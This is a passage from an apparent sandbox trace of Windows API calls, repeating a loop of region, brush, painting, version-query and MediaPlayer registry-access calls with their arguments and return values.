x2=0, y2=0) returned 0x104576d [0089.869] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104576e [0089.869] CombineRgn (hrgnDst=0x104576d, hrgnSrc1=0xed0401dc, hrgnSrc2=0xef0401d9, iMode=1) returned 1 [0089.869] CombineRgn (hrgnDst=0x104576e, hrgnSrc1=0xed0401dc, hrgnSrc2=0xef0401d9, iMode=4) returned 2 [0089.869] CreateSolidBrush (color=0xff) returned 0x210576c [0089.869] CreateSolidBrush (color=0xff0000) returned 0x110576f [0089.869] DeleteObject (ho=0x110576f) returned 1 [0089.869] DeleteObject (ho=0xef0401d9) returned 1 [0089.869] DeleteObject (ho=0xed0401dc) returned 1 [0089.869] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.869] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.869] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.869] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.869] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.987] BeginPath (hdc=0x0) returned 0 [0089.987] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.987] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.987] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.987] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.987] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.987] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.987] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.987] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.988] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf00401d9 [0089.988] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xee0401dc [0089.988] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3045771 [0089.988] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3045772 [0089.988] CombineRgn (hrgnDst=0x3045771, hrgnSrc1=0xf00401d9, hrgnSrc2=0xee0401dc, iMode=1) returned 1 [0089.988] CombineRgn (hrgnDst=0x3045772, hrgnSrc1=0xf00401d9, hrgnSrc2=0xee0401dc, iMode=4) returned 2 [0089.988] CreateSolidBrush (color=0xff) returned 0x210576f [0089.988] CreateSolidBrush (color=0xff0000) returned 0x2105770 [0089.988] DeleteObject (ho=0x2105770) returned 1 [0089.988] DeleteObject (ho=0xee0401dc) returned 1 [0089.988] DeleteObject (ho=0xf00401d9) returned 1 [0089.988] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.988] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.988] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.988] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.988] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.988] BeginPath (hdc=0x0) returned 0 [0089.988] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.988] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.988] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.988] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.988] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.988] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.989] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.989] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.989] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xef0401dc [0089.989] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf10401d9 [0089.989] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045773 [0089.989] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045774 [0089.989] CombineRgn (hrgnDst=0x1045773, hrgnSrc1=0xef0401dc, hrgnSrc2=0xf10401d9, iMode=1) returned 1 [0089.989] CombineRgn (hrgnDst=0x1045774, hrgnSrc1=0xef0401dc, hrgnSrc2=0xf10401d9, iMode=4) returned 2 [0089.989] CreateSolidBrush (color=0xff) returned 0x3105770 [0089.989] CreateSolidBrush (color=0xff0000) returned 0x1105775 [0089.989] DeleteObject (ho=0x1105775) returned 1 [0089.989] DeleteObject (ho=0xf10401d9) returned 1 [0089.989] DeleteObject (ho=0xef0401dc) returned 1 [0089.989] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.989] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.989] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.989] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.989] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.989] BeginPath (hdc=0x0) returned 0 [0089.990] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.990] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.990] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.990] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.990] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.990] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.990] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.990] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.990] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf20401d9 [0089.990] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf00401dc [0089.990] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045776 [0089.990] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045777 [0089.990] CombineRgn (hrgnDst=0x1045776, hrgnSrc1=0xf20401d9, hrgnSrc2=0xf00401dc, iMode=1) returned 1 [0089.990] CombineRgn (hrgnDst=0x1045777, hrgnSrc1=0xf20401d9, hrgnSrc2=0xf00401dc, iMode=4) returned 2 [0089.990] CreateSolidBrush (color=0xff) returned 0x2105775 [0089.990] CreateSolidBrush (color=0xff0000) returned 0x1105778 [0089.991] DeleteObject (ho=0x1105778) returned 1 [0089.991] DeleteObject (ho=0xf00401dc) returned 1 [0089.991] DeleteObject (ho=0xf20401d9) returned 1 [0089.991] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.991] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.991] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.991] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.991] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.991] BeginPath (hdc=0x0) returned 0 [0089.991] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.991] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.991] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.991] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.991] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.991] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.991] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.991] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.991] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf10401dc [0089.991] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf30401d9 [0089.992] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045779 [0089.992] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104577a [0089.992] CombineRgn (hrgnDst=0x1045779, hrgnSrc1=0xf10401dc, hrgnSrc2=0xf30401d9, iMode=1) returned 1 [0089.992] CombineRgn (hrgnDst=0x104577a, hrgnSrc1=0xf10401dc, hrgnSrc2=0xf30401d9, iMode=4) returned 2 [0089.992] CreateSolidBrush (color=0xff) returned 0x2105778 [0089.992] CreateSolidBrush (color=0xff0000) returned 0x110577b [0089.992] DeleteObject (ho=0x110577b) returned 1 [0089.992] DeleteObject (ho=0xf30401d9) returned 1 [0089.992] DeleteObject (ho=0xf10401dc) returned 1 [0089.992] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.992] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.992] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.992] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.992] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.992] BeginPath (hdc=0x0) returned 0 [0089.992] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.992] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.992] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.992] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.992] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.992] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.992] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.992] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.993] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf40401d9 [0089.993] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf20401dc [0089.993] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104577c [0089.993] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104577d [0089.993] CombineRgn (hrgnDst=0x104577c, hrgnSrc1=0xf40401d9, hrgnSrc2=0xf20401dc, iMode=1) returned 1 [0089.993] CombineRgn (hrgnDst=0x104577d, hrgnSrc1=0xf40401d9, hrgnSrc2=0xf20401dc, iMode=4) returned 2 [0089.993] CreateSolidBrush (color=0xff) returned 0x210577b [0089.993] CreateSolidBrush (color=0xff0000) returned 0x110577e [0089.993] DeleteObject (ho=0x110577e) returned 1 [0089.993] DeleteObject (ho=0xf20401dc) returned 1 [0089.993] DeleteObject (ho=0xf40401d9) returned 1 [0089.993] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.993] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.993] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.994] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.994] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.994] BeginPath (hdc=0x0) returned 0 [0089.994] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.994] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.994] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.994] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.994] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.994] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.994] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.994] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.994] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf30401dc [0089.994] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf50401d9 [0089.994] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104577f [0089.994] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045780 [0089.994] CombineRgn (hrgnDst=0x104577f, hrgnSrc1=0xf30401dc, hrgnSrc2=0xf50401d9, iMode=1) returned 1 [0089.994] CombineRgn (hrgnDst=0x1045780, hrgnSrc1=0xf30401dc, hrgnSrc2=0xf50401d9, iMode=4) returned 2 [0089.994] CreateSolidBrush (color=0xff) returned 0x210577e [0089.994] CreateSolidBrush (color=0xff0000) returned 0x1105781 [0089.994] DeleteObject (ho=0x1105781) returned 1 [0089.994] DeleteObject (ho=0xf50401d9) returned 1 [0089.995] DeleteObject (ho=0xf30401dc) returned 1 [0089.995] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.995] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.995] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.995] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.995] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.995] BeginPath (hdc=0x0) returned 0 [0089.995] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.995] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.995] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.995] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.995] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.995] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.995] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.995] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.995] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf60401d9 [0089.995] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf40401dc [0089.995] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045782 [0089.995] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045783 [0089.996] CombineRgn (hrgnDst=0x1045782, hrgnSrc1=0xf60401d9, hrgnSrc2=0xf40401dc, iMode=1) returned 1 [0089.996] CombineRgn (hrgnDst=0x1045783, hrgnSrc1=0xf60401d9, hrgnSrc2=0xf40401dc, iMode=4) returned 2 [0089.996] CreateSolidBrush (color=0xff) returned 0x2105781 [0089.996] CreateSolidBrush (color=0xff0000) returned 0x1105784 [0089.996] DeleteObject (ho=0x1105784) returned 1 [0089.996] DeleteObject (ho=0xf40401dc) returned 1 [0089.996] DeleteObject (ho=0xf60401d9) returned 1 [0089.996] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.996] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.996] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.996] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.996] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.996] BeginPath (hdc=0x0) returned 0 [0089.996] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.996] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.996] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.996] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.996] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.996] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.996] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.996] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.997] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf50401dc [0089.997] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf70401d9 [0089.997] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045785 [0089.997] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045786 [0089.997] CombineRgn (hrgnDst=0x1045785, hrgnSrc1=0xf50401dc, hrgnSrc2=0xf70401d9, iMode=1) returned 1 [0089.997] CombineRgn (hrgnDst=0x1045786, hrgnSrc1=0xf50401dc, hrgnSrc2=0xf70401d9, iMode=4) returned 2 [0089.997] CreateSolidBrush (color=0xff) returned 0x2105784 [0089.997] CreateSolidBrush (color=0xff0000) returned 0x1105787 [0089.997] DeleteObject (ho=0x1105787) returned 1 [0089.997] DeleteObject (ho=0xf70401d9) returned 1 [0089.997] DeleteObject (ho=0xf50401dc) returned 1 [0089.997] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.997] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.997] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.997] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.997] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.997] BeginPath (hdc=0x0) returned 0 [0089.997] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.997] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.997] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.997] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.997] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.997] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.998] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.998] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.998] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf80401d9 [0089.998] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf60401dc [0089.998] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045788 [0089.998] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045789 [0089.998] CombineRgn (hrgnDst=0x1045788, hrgnSrc1=0xf80401d9, hrgnSrc2=0xf60401dc, iMode=1) returned 1 [0089.998] CombineRgn (hrgnDst=0x1045789, hrgnSrc1=0xf80401d9, hrgnSrc2=0xf60401dc, iMode=4) returned 2 [0089.998] CreateSolidBrush (color=0xff) returned 0x2105787 [0089.998] CreateSolidBrush (color=0xff0000) returned 0x110578a [0089.998] DeleteObject (ho=0x110578a) returned 1 [0089.998] DeleteObject (ho=0xf60401dc) returned 1 [0089.998] DeleteObject (ho=0xf80401d9) returned 1 [0089.998] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.998] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: 